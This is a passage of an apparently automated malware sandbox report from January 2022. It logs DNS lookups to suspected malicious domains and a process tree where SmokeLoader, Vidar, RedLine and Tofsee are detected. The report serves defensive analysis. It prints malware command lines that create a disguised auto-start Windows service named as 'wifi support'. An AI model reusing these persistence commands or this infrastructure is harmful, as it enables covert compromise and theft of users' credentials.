                                            Jan 14, 2022 20:29:48.020026922 CET8.8.8.8192.168.2.40xbff0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.191282988 CET8.8.8.8192.168.2.40xa2f1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.403235912 CET8.8.8.8192.168.2.40x8df1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.596955061 CET8.8.8.8192.168.2.40x4328No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.779263020 CET8.8.8.8192.168.2.40xfe2bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:48.975230932 CET8.8.8.8192.168.2.40xd0No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.159852028 CET8.8.8.8192.168.2.40x4039No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.325958967 CET8.8.8.8192.168.2.40xa0aaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.493980885 CET8.8.8.8192.168.2.40xc6d3No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.676035881 CET8.8.8.8192.168.2.40x8431No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:49.849984884 CET8.8.8.8192.168.2.40x8d3dNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.075565100 CET8.8.8.8192.168.2.40xee16No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.237838984 CET8.8.8.8192.168.2.40xdf9No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.404228926 CET8.8.8.8192.168.2.40xbc85No error (0)goo.su172.67.139.105A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.404228926 CET8.8.8.8192.168.2.40xbc85No error (0)goo.su104.21.38.221A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:53.844762087 CET8.8.8.8192.168.2.40xc6edNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.020250082 CET8.8.8.8192.168.2.40xafa7No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.239521980 CET8.8.8.8192.168.2.40xce80No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.408709049 CET8.8.8.8192.168.2.40x66dbNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.573277950 CET8.8.8.8192.168.2.40x75acNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.733412027 CET8.8.8.8192.168.2.40x81b7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:29:54.896519899 CET8.8.8.8192.168.2.40x3011No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:02.233520031 CET8.8.8.8192.168.2.40x5c1aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:02.399200916 CET8.8.8.8192.168.2.40xee93No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.127019882 CET8.8.8.8192.168.2.40xa06fNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.290981054 CET8.8.8.8192.168.2.40xce9bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.464379072 CET8.8.8.8192.168.2.40x87abNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:04.640945911 CET8.8.8.8192.168.2.40x4535No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:12.016377926 CET8.8.8.8192.168.2.40xcf0aNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:12.201699972 CET8.8.8.8192.168.2.40xbceaNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:12.395394087 CET8.8.8.8192.168.2.40x475cNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:17.920705080 CET8.8.8.8192.168.2.40xe8cNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:18.199744940 CET8.8.8.8192.168.2.40x2817No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:18.287906885 CET8.8.8.8192.168.2.40xfb9dNo error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:18.434205055 CET8.8.8.8192.168.2.40xe2ebNo error (0)data-host-coin-8.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:20.746655941 CET8.8.8.8192.168.2.40xf1edNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:20.923949003 CET8.8.8.8192.168.2.40x38f1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:23.129528046 CET8.8.8.8192.168.2.40xcf31No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:27.675003052 CET8.8.8.8192.168.2.40x803bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:27.865788937 CET8.8.8.8192.168.2.40x4d74No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.032931089 CET8.8.8.8192.168.2.40xdb9bNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.275589943 CET8.8.8.8192.168.2.40xfaf7No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.478533983 CET8.8.8.8192.168.2.40x78e4No error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:28.489126921 CET8.8.8.8192.168.2.40xcb6No error (0)iplogger.org148.251.234.83A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:31.883305073 CET8.8.8.8192.168.2.40xa7ebNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:32.173628092 CET8.8.8.8192.168.2.40xe5f1No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:32.412640095 CET8.8.8.8192.168.2.40xcd5eNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:34.867557049 CET8.8.8.8192.168.2.40xef5dNo error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.089627981 CET8.8.8.8192.168.2.40xe884No error (0)host-data-coin-11.com8.209.70.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.296699047 CET8.8.8.8192.168.2.40xd4eeNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com40.93.207.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com40.93.212.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com40.93.207.1A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com104.47.53.36A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com104.47.54.36A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:35.804399967 CET8.8.8.8192.168.2.40x7bd0No error (0)microsoft-com.mail.protection.outlook.com52.101.24.0A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:42.953994989 CET8.8.8.8192.168.2.40x2726No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.238307953 CET8.8.8.8192.168.2.40x3fe1No error (0)github.com140.82.121.4A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.521907091 CET8.8.8.8192.168.2.40xc3No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.521907091 CET8.8.8.8192.168.2.40xc3No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.521907091 CET8.8.8.8192.168.2.40xc3No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:44.521907091 CET8.8.8.8192.168.2.40xc3No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:30:48.260907888 CET8.8.8.8192.168.2.40xee5aNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)
                                            Jan 14, 2022 20:31:08.620507956 CET8.8.8.8192.168.2.40x1b20No error (0)patmushta.info94.142.143.116A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • pieilmtu.com
                                              • host-data-coin-11.com
                                            • nwilglig.org
                                            • nfbqltka.com
                                            • cvdhldsf.net
                                            • qcjatd.com
                                            • xrovmrlel.net
                                            • cmgcwqatb.org
                                            • owgvnnuoml.com
                                            • data-host-coin-8.com
                                            • opviax.net
                                            • nunmqyect.net
                                            • kyadmhioim.com
                                            • rnsdjgkq.org
                                            • sjgvu.com
                                            • unicupload.top
                                            • cqsurm.com
                                            • gculkm.com
                                            • ifvodd.net
                                            • lvmiyiiy.com
                                            • pegqugok.net
                                            • uhiqru.org
                                            • jbinuykf.net
                                            • kybdaip.org
                                            • 185.7.214.171:8080
                                            • doynnfulb.net
                                            • nxysak.org
                                            • jxgxnkpb.org
                                            • mfkcxcj.org
                                            • codldamrms.net
                                            • niaqngu.org
                                            • hmpbvq.org
                                            • ktpvhvj.com
                                            • ovfkbfuk.org
                                            • cgqgnij.net
                                            • pdjtd.com
                                            • jcppp.com
                                            • fnkfxr.net
                                            • crnelkeerw.net
                                            • lyxrabhsyj.net
                                            • dvrkmsgph.org
                                            • bdwjscwkyb.org
                                            • laegissbnw.net
                                            • pmulpwtk.net
                                            • vgfuhgdk.com
                                            • gjmsrnrg.net
                                            • hffekwpew.org
                                            • nrofkgudk.org
                                            • ldeax.net
                                            • mvdnpk.org
                                            • uaeudvuct.net
                                            • tfmwuwhaf.org
                                            • 81.163.30.181
                                            • bjmmoxjkh.com
                                            • uekxwe.org
                                            • 74.201.28.62
                                            • ybthjouy.net
                                            • qycehx.net
                                            • udwhex.net
                                            • 185.163.204.22
                                            • 185.163.204.24
                                            • hriqvkh.com
                                            • rajclxd.org
                                            • rkgofw.com
                                            • cmhrt.com
                                            • rdctx.net
                                            • hqdkqcs.com
                                            • cfyeur.com
                                            • lwqbhm.net
                                            • podwtxiqj.com
                                            • kxheih.com
                                            • ahptoxawd.com
                                            • ruiwhjpxrd.net
                                            • ukonhqmwew.net
                                            • qmeixpxj.org

                                            Code Manipulations

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: ECD2MpEBSf.exe PID: 7104 Parent PID: 6048

                                            General

                                            Start time:20:28:28
                                            Start date:14/01/2022
                                            Path:C:\Users\user\Desktop\ECD2MpEBSf.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\ECD2MpEBSf.exe"
                                            Imagebase:0x400000
                                            File size:320512 bytes
                                            MD5 hash:31F0D01EE1FD6876668692791657D97E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:low

                                            Analysis Process: ECD2MpEBSf.exe PID: 7132 Parent PID: 7104

                                            General

                                            Start time:20:28:29
                                            Start date:14/01/2022
                                            Path:C:\Users\user\Desktop\ECD2MpEBSf.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\user\Desktop\ECD2MpEBSf.exe"
                                            Imagebase:0x400000
                                            File size:320512 bytes
                                            MD5 hash:31F0D01EE1FD6876668692791657D97E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.721727855.00000000006A1000.00000004.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000001.00000002.721690876.0000000000680000.00000004.00000001.sdmp, Author: Joe Security
                                            Reputation:low

                                            Analysis Process: explorer.exe PID: 3424 Parent PID: 7132

                                            General

                                            Start time:20:28:36
                                            Start date:14/01/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff6fee60000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000000.708255964.00000000044C1000.00000020.00020000.sdmp, Author: Joe Security
                                            Reputation:high

                                            Analysis Process: svchost.exe PID: 6408 Parent PID: 568

                                            General

                                            Start time:20:28:37
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: svchost.exe PID: 3512 Parent PID: 568

                                            General

                                            Start time:20:28:55
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: jgdhbua PID: 6700 Parent PID: 968

                                            General

                                            Start time:20:29:10
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Roaming\jgdhbua
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\jgdhbua
                                            Imagebase:0x400000
                                            File size:320512 bytes
                                            MD5 hash:31F0D01EE1FD6876668692791657D97E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low

                                            Analysis Process: svchost.exe PID: 6680 Parent PID: 568

                                            General

                                            Start time:20:29:10
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: jgdhbua PID: 6784 Parent PID: 6700

                                            General

                                            Start time:20:29:11
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Roaming\jgdhbua
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\jgdhbua
                                            Imagebase:0x400000
                                            File size:320512 bytes
                                            MD5 hash:31F0D01EE1FD6876668692791657D97E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.776599972.00000000004F0000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000B.00000002.776791205.00000000020A1000.00000004.00020000.sdmp, Author: Joe Security
                                            Reputation:low

                                            Analysis Process: BB8A.exe PID: 6816 Parent PID: 3424

                                            General

                                            Start time:20:29:12
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Local\Temp\BB8A.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\BB8A.exe
                                            Imagebase:0x400000
                                            File size:301056 bytes
                                            MD5 hash:277680BD3182EB0940BC356FF4712BEF
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 46%, Metadefender, Browse
                                            • Detection: 77%, ReversingLabs
                                            Reputation:moderate

                                            Analysis Process: svchost.exe PID: 6964 Parent PID: 568

                                            General

                                            Start time:20:29:15
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: WerFault.exe PID: 6876 Parent PID: 6964

                                            General

                                            Start time:20:29:16
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6816 -ip 6816
                                            Imagebase:0x1010000
                                            File size:434592 bytes
                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: CCB2.exe PID: 6844 Parent PID: 3424

                                            General

                                            Start time:20:29:17
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Local\Temp\CCB2.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\CCB2.exe
                                            Imagebase:0x400000
                                            File size:324608 bytes
                                            MD5 hash:043B44289E31BD54357F9A5C21833259
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 0000000F.00000002.775841578.00000000007F9000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low

                                            Analysis Process: WerFault.exe PID: 6968 Parent PID: 6816

                                            General

                                            Start time:20:29:17
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\WerFault.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6816 -s 520
                                            Imagebase:0x1010000
                                            File size:434592 bytes
                                            MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: D936.exe PID: 7124 Parent PID: 3424

                                            General

                                            Start time:20:29:21
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Local\Temp\D936.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\D936.exe
                                            Imagebase:0x400000
                                            File size:320512 bytes
                                            MD5 hash:9517CA2BC20EC061024C1209970CCD2E
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.796450954.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000002.797091655.00000000022B0000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_Tofsee, Description: Yara detected Tofsee, Source: 00000011.00000003.779473426.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low

                                            Analysis Process: 3D34.exe PID: 6404 Parent PID: 3424

                                            General

                                            Start time:20:29:23
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Local\Temp\3D34.exe
                                            Imagebase:0xec0000
                                            File size:537088 bytes
                                            MD5 hash:D7DF01D8158BFADDC8BA48390E52F355
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.833275323.00000000041F1000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000012.00000002.833464312.0000000004361000.00000004.00000001.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Avira
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 46%, Metadefender, Browse
                                            • Detection: 89%, ReversingLabs
                                            Reputation:moderate

                                            Analysis Process: cmd.exe PID: 6412 Parent PID: 7124

                                            General

                                            Start time:20:29:25
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\qeprvgom\
                                            Imagebase:0x11d0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: conhost.exe PID: 4652 Parent PID: 6412

                                            General

                                            Start time:20:29:25
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: cmd.exe PID: 5468 Parent PID: 7124

                                            General

                                            Start time:20:29:26
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\krmdinzg.exe" C:\Windows\SysWOW64\qeprvgom\
                                            Imagebase:0x11d0000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: conhost.exe PID: 4672 Parent PID: 5468

                                            General

                                            Start time:20:29:26
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: svchost.exe PID: 6064 Parent PID: 568

                                            General

                                            Start time:20:29:27
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                            Imagebase:0x7ff6eb840000
                                            File size:51288 bytes
                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: sc.exe PID: 4608 Parent PID: 7124

                                            General

                                            Start time:20:29:27
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\sc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\sc.exe" create qeprvgom binPath= "C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d\"C:\Users\user\AppData\Local\Temp\D936.exe\"" type= own start= auto DisplayName= "wifi support
                                            Imagebase:0xb40000
                                            File size:60928 bytes
                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: conhost.exe PID: 6424 Parent PID: 4608

                                            General

                                            Start time:20:29:27
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: sc.exe PID: 6464 Parent PID: 7124

                                            General

                                            Start time:20:29:28
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\sc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\sc.exe" description qeprvgom "wifi internet conection
                                            Imagebase:0xb40000
                                            File size:60928 bytes
                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: conhost.exe PID: 6604 Parent PID: 6464

                                            General

                                            Start time:20:29:29
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: sc.exe PID: 1716 Parent PID: 7124

                                            General

                                            Start time:20:29:29
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\sc.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Windows\System32\sc.exe" start qeprvgom
                                            Imagebase:0xb40000
                                            File size:60928 bytes
                                            MD5 hash:24A3E2603E63BCB9695A2935D3B24695
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: conhost.exe PID: 64 Parent PID: 1716

                                            General

                                            Start time:20:29:30
                                            Start date:14/01/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff724c50000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language

                                            Analysis Process: krmdinzg.exe PID: 6888 Parent PID: 568

                                            General

                                            Start time:20:29:30
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\qeprvgom\krmdinzg.exe /d"C:\Users\user\AppData\Local\Temp\D936.exe"
                                            Imagebase:0x400000
                                            File size:10624000 bytes
                                            MD5 hash:C8DE2E3F0DF5D9E1C126828B1444DBEA
